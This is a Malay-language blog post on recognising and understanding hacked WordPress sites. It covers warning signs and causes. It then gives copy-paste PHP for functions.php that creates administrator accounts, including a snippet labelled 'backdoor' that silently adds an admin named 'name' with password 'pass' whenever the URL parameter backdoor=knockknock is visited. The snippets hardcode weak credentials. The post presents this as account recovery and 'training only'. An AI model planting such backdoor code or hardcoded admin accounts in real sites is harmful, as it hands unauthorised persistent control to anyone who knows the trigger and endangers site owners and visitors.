Laman WordPress Telah Digodam

Adakah anda tahu bahawa lebih daripada 100,000 laman web digodam setiap hari? WordPress adalah platform blogging yang terbesar. Terdapat berjuta-juta pengguna dan jumlahnya berkembang amat pesat setiap hari. Ini bermakna bahawa penggodam juga akan mengutamakan WordPress di tempat nombor satu apabila ingin mencerobohi mana-mana laman web.

Biasanya, jika anda digodam, anda akan mengetahuinya serta-merta. Laman web anda akan menjadi tidak dapat diakses; anda tidak akan dapat log masuk dan kadang-kadang penggodam akan meninggalkan mesej di halaman depan “Digodam oleh siapa”. Tetapi selalunya, anda tidak akan perasan bahawa sesuatu telah berubah.

Jika laman WordPress anda digodam, agak sangat sukar untuk memulihkannya sepenuhnya. Ini adalah benar terutamanya apabila anda tidak mempunyai kepakaran teknikal. Tetapi, jangan panik dan melakukan sesuatu yang bodoh. Berurusan dengan laman WordPress yang digodam adalah satu cabaran seperti mendaki gunung atau apa-apa cabaran yang lain.

Tanda-tanda laman WordPress Telah Digodam

  • Anda tidak boleh log masuk ke WordPress anda
  • Laman web disenarai hitamkan oleh Google Safe Browsing
  • Laman web disenarai hitam oleh Google, Bing, Yahoo dan lain-lain enjin carian
  • Pembekal hos telah menggantung laman web anda
  • Laman web telah diberi amaran sebab menyebarkan perisian malware
  • Antivirus memberi amaran bahawa laman web anda mempunyai virus atau perisian malware
  • Keselamatan siber E-mel anda mengatakan bahawa laman web anda sedang digunakan untuk menyerang laman web lain
  • Tiba-tiba banyak pengguna baru diciptakan
  • Laman web anda telah menjana banyak pengalihan ke laman web lain
  • Anda tidak boleh menghantar e-mel seperti biasa kerana penggodam menggunakannya untuk membuat spam
  • Kerja kron atau peristiwa berjadual bertambah dalam panel kawalan web anda

Ini adalah pengetahuan yang diperlukan supaya anda tahu bagaimana anda mendapat digodam, jadi anda boleh melindungi laman WordPress anda dalam masa yang akan datang.

Kenapa laman WordPress Telah Digodam

Terdapat banyak sebab mengapa laman WordPress digodam, berikut adalah beberapa sebab mengapa WordPress laman web adalah sasaran penggodaman.

  • Anda tidak mengemaskini WordPress, tema, plugin, dll. Terdapat banyak kelemahan keselamatan yang didapati pada WordPress yang ketinggalan zaman. Jika anda kerap tidak mengemaskinikan tema, plugin dan versi WordPress ke versi yang terkini, laman web anda terdedah.
  • Masih menggunakan “admin” sebagai nama pengguna serta kata laluan yang lemah
  • Jangan pasang plugin dan tema yang dikatakan “nulled”. Ia telah direka untuk menyebabkan aktiviti penggodaman dan ianya mengumpul maklumat dari laman web anda.
  • Menggunakan web hosting yang lemah atau tidak selamat juga mungkin menyebabkan masalah ini. Oleh itu, mempunyai hosting web yang selamat adalah satu lagi bahagian yang amat penting.

Bagaimana laman WordPress Telah Digodam

Jika anda ingin mengetahui lebih lanjut mengenai bagaimana laman WordPress telah digodam. Tujuan artikel ini adalah untuk menerangkan bagaimana untuk menggodam atau mendapatkan semula akses ke laman WordPress yang dimiliki oleh anda, supaya anda mempunyai hak untuk mengedit, mentadbir dan mengakses. Kami tidak bertanggungjawab terhadap tindakan anda. Panduan ini hanya untuk tujuan latihan sahaja. Berikut adalah cara-cara penggodam mungkin menlakukannya untuk memasuki ke laman web anda.

  • Mysql akses : Jika anda menggunakan CPanel, log masuk, buka phpMyAdmin dan tukar kata laluan admin dan e-mel dalam jadual pangkalan data “wp_users”. Atau anda boleh mencipta admin yang baru (direkod dalam artikel yang lalu klik disini)
  • functions.php : Salin/tampal kod berikut pada akhir fail ini. Jangan padamkan penutupan ?> Tag PHP jika anda mempunyai mereka. Mereka perlu berada di barisan terakhir. Jadi masukkan kod ini sebelumnya.
$new_user_email = '[email protected]';
$new_user_password = '12345';

if(!username_exists($new_user_email)) {
  $user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);

  wp_update_user(array('ID' => $user_id, 'nickname' => $new_user_email));

  $user = new WP_User($user_id);
  $user->set_role('administrator');
}

Jikalau terdapat pengguna dan e-mel yang sama maka akaun baru tidak akan dicipta, jadi pastikan ianya adalah baru. Selepas menyimpan fail, anda perlu membuka laman web anda, kod akan dioperasikan, akaun baru akan dicipta dan anda dapat log masuk dengannya. Lepas tu sila padam kod ni dalam fail functions.php.

  • Backdoors : ini memintas kaedah biasa mengakses laman web anda, contohnya melalui skrip atau fail tersembunyi. Buka fail functions.php. Salin/tampal kod berikut:
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
        If ($_GET['backdoor'] == 'knockknock') {
                require('wp-includes/registration.php');
                If (!username_exists('username')) {
                        $user_id = wp_create_user('name', 'pass');
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                }
        }
}
?>

Kod akan mencipta pentadbir baru di laman web ini kemudian layari “http://www.yourdomain.com/?backdoor=knockknock”. Selepas halaman dimuatkan, nama pengguna baru anda adalah “name” dan kata laluan “pass”. Anda boleh menukar bahawa dalam kod di atas dengan menukar “name” dan “pass” kepada apa sahaja yang anda mahu.

  • via FTP : masuk ke ftp anda. Buka fail functions.php. Salin/tampal kod berikut:
function admin_account(){
$user = 'Username';
$pass = 'Password';
$email = '[email protected]';
if ( !username_exists( $user )  && !email_exists( $email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
} }
add_action('init','admin_account');

Tukar nama pengguna, kata laluan dan e-mel kepada sesuatu yang anda suka. Sebaik sahaja anda telah menyimpan perubahan fail, anda telah selesai dan anda boleh masuk ke panel WordPress anda. Gunakanlah maklumat baru untuk masuk dan sebaik sahaja anda mengesahkan akaun, anda boleh memadamkan kod tersebut daripada fail functions.php.

  • Pharma hacks : eksploitasi yang digunakan untuk menyelitkan kod ke dalam versi lama WordPress.
  • Cubaan Brute-force login : penggodam menggunakan automasi untuk mengeksploitasi kata laluan yang lemah dan mendapat akses ke laman web anda.
  • Penghalaan Malicious : backdoors digunakan untuk menambah penghalaan ke laman web anda.
  • Cross-site scripting (XSS) : kelemahan yang paling biasa ditemui dalam plugin WordPress, skrip suntikan ini kemudian membenarkan penggodam menghantar kod berniat jahat kepada pelayar pengguna.
  • Denial of Service (DoS) : penolakan perkhidmatan iaitu menyebabkan laman web anda tidak lagi dapat dilihat atau berfungsi.

Dalam artikel seterusnya ia akan menunjukkan langkah-langkah untuk membersihkan laman WordPress anda dan membantu laman WordPress anda menjadikan lebih selamat dan memberikan anda beberapa petua untuk menghalang laman WordPress anda daripada digodam lagi.

You may also like...